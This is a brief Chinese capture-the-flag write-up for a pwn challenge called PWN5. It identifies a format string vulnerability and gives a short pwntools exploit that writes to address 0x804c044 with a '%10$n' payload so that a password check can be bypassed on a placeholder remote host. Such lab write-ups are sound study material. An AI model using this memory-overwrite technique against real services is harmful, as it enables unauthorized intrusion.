checksec一下
IDA打开看看,发现格式化字符串漏洞
那么思路很简单,先找偏移,然后通过格式化字符串漏洞任意地址写来更改unk_804c044的值
from pwn import *
from LibcSearcher import *
context.os='linux'
context.arch='i386'
context.log_level='debug'
sla=lambda x,y:io.sendlineafter(x,y)
io=remote('xxx',xxx)
payload=p32(0x804c044)+'%10$n'
sla('name:',payload)
sla('passwd:','4')
io.interactive()
附件:PWN5